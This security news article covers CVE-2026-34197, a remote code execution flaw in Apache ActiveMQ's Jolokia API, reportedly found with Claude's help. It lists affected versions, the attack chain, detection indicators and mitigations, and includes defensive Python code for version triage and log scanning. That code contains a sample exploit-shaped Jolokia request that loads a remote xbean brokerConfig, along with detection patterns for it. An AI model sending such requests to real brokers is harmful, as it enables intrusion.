PROBABLYPWNED
Vulnerabilities | April 8, 2026 | 4 min read

13-Year-Old ActiveMQ Bug Found by Claude AI Enables RCE

CVE-2026-34197 exposes Apache ActiveMQ to remote code execution via the Jolokia API. Horizon3 researcher used Claude to uncover the flaw in under 10 minutes. Patch now.

Marcus Chen

A critical remote code execution vulnerability in Apache ActiveMQ sat undetected for over a decade until a security researcher used Anthropic's Claude AI to find it in under 10 minutes. CVE-2026-34197 allows attackers to execute arbitrary commands on affected message brokers through the Jolokia management API.

Apache patched the flaw on March 30, 2026, releasing fixed versions 5.19.4 and 6.2.3. Organizations running older versions should treat this as a high priority—ActiveMQ has been repeatedly targeted in real-world attacks, with two prior CVEs already on CISA's Known Exploited Vulnerabilities catalog.

TL;DR

  • What happened: 13-year-old RCE vulnerability discovered in Apache ActiveMQ's Jolokia API
  • Who's affected: ActiveMQ Classic before 5.19.4, versions 6.0.0 through 6.2.2
  • Severity: CVSS 8.8 (High), but unauthenticated on versions 6.0.0-6.1.1
  • Action required: Upgrade to ActiveMQ 5.19.4 or 6.2.3 immediately

How the Attack Works

The vulnerability exploits a chain of legitimate features in ActiveMQ's architecture. Horizon3's research details the attack mechanism:

  1. Jolokia API access: ActiveMQ's web management console (port 8161) exposes JMX operations via REST at /api/jolokia/
  2. MBean operation abuse: Post-2023 security patches permit operations on ActiveMQ MBeans, including addNetworkConnector()
  3. VM transport with remote config: The vm:// transport can load Spring XML configurations from attacker-controlled URLs

An attacker calls addNetworkConnector() with a crafted URI containing a brokerConfig parameter pointing to a malicious Spring configuration file. When processed, ActiveMQ's VM transport layer creates an embedded broker that loads and executes the attacker's payload.

The attack requires authentication on most versions—but default credentials remain admin:admin in many deployments. Message broker infrastructure shares the same default credentials problem that plagues similar systems like Eclipse OpenMQ.

Unauthenticated RCE on Version 6.x

The severity escalates dramatically for ActiveMQ 6.0.0 through 6.1.1. These versions shipped with CVE-2024-32114, which exposes the Jolokia API without authentication. Combined with CVE-2026-34197, attackers can achieve unauthenticated remote code execution—no credentials required.

Organizations running 6.x branches should verify their version immediately. The jump from authenticated to unauthenticated exploitation changes this from a concerning vulnerability to a critical one.
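A small version-triage helper, added here as an example and not code from the article, Horizon3 or the ActiveMQ project: it classifies an ActiveMQ Classic version string against the affected ranges stated above (before 5.19.4; 6.0.0 through 6.2.2) and flags the 6.0.0 through 6.1.1 window where CVE-2024-32114 removes the authentication barrier. The function and dictionary key names are this example's own.

```python
from typing import Tuple

# Ranges as given in the article
FIXED_5X = (5, 19, 4)                 # Classic before 5.19.4 is affected
AFFECTED_6X = ((6, 0, 0), (6, 2, 2))  # 6.0.0 through 6.2.2 is affected
UNAUTH_6X = ((6, 0, 0), (6, 1, 1))    # CVE-2024-32114: Jolokia reachable without auth

def parse_version(v: str) -> Tuple[int, int, int]:
    """Turn '5.18.3' or '6.1.0-SNAPSHOT' into a comparable (major, minor, patch)."""
    core = v.strip().split("-")[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]

def triage(v: str) -> dict:
    """Classify one ActiveMQ Classic version against the article's ranges.

    Returns whether CVE-2026-34197 applies, whether the Jolokia API is reachable
    without credentials on that version (CVE-2024-32114), and the fixed release.
    """
    ver = parse_version(v)
    if ver[0] == 6:
        vulnerable = AFFECTED_6X[0] <= ver <= AFFECTED_6X[1]
        unauth = UNAUTH_6X[0] <= ver <= UNAUTH_6X[1]
        upgrade = "6.2.3" if vulnerable else None
    elif ver[0] < 6:
        vulnerable = ver < FIXED_5X
        unauth = False
        upgrade = "5.19.4" if vulnerable else None
    else:
        # A major line the article does not cover: report unknown rather than guess
        vulnerable, unauth, upgrade = None, None, None
    return {"vulnerable": vulnerable, "unauthenticated_jolokia": unauth,
            "upgrade_to": upgrade}

if __name__ == "__main__":
    for v in ("5.18.3", "5.19.4", "6.1.1", "6.2.2", "6.2.3"):
        print(v, triage(v))
```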

AI-Assisted Vulnerability Discovery

Naveen Sunkavally, the Horizon3 researcher who found the flaw, described the discovery process as "80% Claude with 20% gift-wrapping by a human." Using Claude as a research assistant, he identified the vulnerable code path in under 10 minutes.

This marks another milestone for AI-assisted security research. The Apache Struts XXE vulnerability disclosed earlier this year was similarly found by Zast AI, an autonomous security research system. The pattern suggests AI tools are becoming standard equipment in vulnerability hunting.

The discovery is notable because it emerged from the interaction of multiple legitimate features rather than a single coding mistake—exactly the kind of complex interaction that traditional static analysis struggles to identify. As AI tools increasingly surface critical flaws like the CVSS 10.0 RCE in Flowise AI, expect more decade-old bugs to emerge from previously audited codebases.

Detection and Indicators

Organizations should monitor for:

  • Suspicious broker connections: Internal VM transport protocol usage with brokerConfig=xbean:http:// parameters
  • Jolokia API abuse: POST requests to /api/jolokia/ containing addNetworkConnector in the body
  • Outbound HTTP connections: Unexpected outbound requests from the ActiveMQ process to retrieve remote configurations
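The first two indicators expressed as detection logic, added here as an example and not code from the article or Horizon3. It assumes request records (method, path, body) from a reverse proxy or WAF that logs bodies, plus raw broker log lines; the sample records below are constructed for the example and use the 203.0.113.0/24 documentation address range.

```python
import re
from typing import Dict, Iterable, List

# Indicator from the article: a vm:// URI carrying a remote xbean brokerConfig
REMOTE_XBEAN = re.compile(r"brokerConfig=xbean:https?://", re.IGNORECASE)
JOLOKIA_PATH = re.compile(r"^/api/jolokia(/|$)")

def scan_requests(requests: Iterable[Dict[str, str]]) -> List[str]:
    """One finding per POST to /api/jolokia/ whose body names addNetworkConnector."""
    findings = []
    for req in requests:
        if req.get("method", "").upper() != "POST":
            continue
        if not JOLOKIA_PATH.match(req.get("path", "")):
            continue
        body = req.get("body", "")
        if "addNetworkConnector" not in body:
            continue
        reason = "addNetworkConnector via Jolokia"
        if REMOTE_XBEAN.search(body):
            reason += " with remote xbean brokerConfig"
        findings.append(f"{req.get('src', '?')}: {reason}")
    return findings

def scan_broker_log(lines: Iterable[str]) -> List[str]:
    """Broker log lines mentioning a remote xbean brokerConfig (an after-the-fact signal)."""
    return [ln for ln in lines if REMOTE_XBEAN.search(ln)]

# Constructed sample data, not real traffic
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "GET", "path": "/api/jolokia/version", "body": ""},
    {"src": "10.0.0.9", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"read","mbean":"java.lang:type=Memory"}'},
    {"src": "10.0.0.9", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"exec","operation":"addNetworkConnector",'
             '"arguments":["vm://local?brokerConfig=xbean:http://203.0.113.7/c.xml"]}'},
]
SAMPLE_LOG = [
    "INFO  | Apache ActiveMQ 6.1.0 (localhost) is starting",
    "WARN  | Could not load broker config vm://local?brokerConfig=xbean:http://203.0.113.7/c.xml",
]

if __name__ == "__main__":
    print(scan_requests(SAMPLE_REQUESTS))
    print(scan_broker_log(SAMPLE_LOG))
```

Only the third request and the second log line are flagged; the benign Jolokia read and the GET to the version endpoint pass through.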

Warning messages about configuration problems in broker logs may indicate payload execution has already occurred. By that point, the attacker's code has run.

Why This Matters

ActiveMQ has a troubled security history. CVE-2023-46604, a CVSS 10.0 deserialization flaw, was weaponized by ransomware gangs including LockBit within days of disclosure. Groups like Storm-1175 have shown how quickly threat actors weaponize high-value vulnerabilities—often within 24 hours. The prior ActiveMQ flaw remains actively exploited for cryptomining and initial access operations.

Message brokers occupy a privileged position in enterprise architectures. They handle inter-service communication, transaction queues, and event streams. Compromising the broker means compromising the trust layer between applications. Similar to the critical vulnerabilities in Apache Tika that threatened document processing pipelines, a flaw in core infrastructure components creates cascading risk.

Mitigation Steps

  1. Patch immediately: Upgrade to ActiveMQ Classic 5.19.4 or 6.2.3
  2. Restrict network access: Block external access to port 8161 (web console) and port 61616 (OpenWire protocol)
  3. Rotate credentials: Change default admin/admin credentials—this should have been done at installation
  4. Network segmentation: Isolate message broker infrastructure from general network access
  5. Monitor logs: Watch for the detection indicators described above

ActiveMQ Artemis is not affected by this vulnerability. Organizations considering a migration may find this a compelling reason to evaluate the newer broker.

The patch removes the ability for addNetworkConnector to register vm:// transports via the Jolokia API entirely—a surgical fix that eliminates the attack vector without breaking legitimate functionality.
